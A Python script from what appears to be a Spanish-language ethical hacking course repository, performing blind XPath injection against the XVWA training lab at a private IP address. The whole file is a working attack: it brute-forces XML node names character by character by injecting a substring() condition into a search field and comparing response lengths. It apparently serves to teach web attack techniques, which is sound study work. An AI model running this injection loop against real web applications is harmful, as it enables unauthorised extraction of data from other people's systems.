infosec/Introduccion-hacking-hack4u/tema_6_owasp/26_xpath/xpath_injection.py
2024-02-25 18:59:04 +01:00

70 lines
1.3 KiB
Python

#!/var/bin/env python
import pdb
import requests
import signal
import string
import sys
import time
from pwn import *
# Ctrl-C handler
def signal_handler(signal, frame):
print('\n\n[!] Ctrl-C. Saliendo...')
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
# Variables globales
main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters
def xPathInjection():
data = ""
p1 = log.progress("Inyeccion XPath")
p1.status("Iniciando ataque de fuerza bruta")
time.sleep(2)
p2 = log.progress("Data")
for position in range(1, 8):
for character in characters:
# post_data = {
# 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
# 'submit': ''
# }
post_data = {
'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
'submit': ''
}
r = requests.post(main_url, data=post_data)
if len(r.text) != 8686:
data += character
p2.status(data)
break
p1.success("Inyeccion XPath completada")
p2.success("Data: %s" % data)
if __name__ == "__main__":
xPathInjection()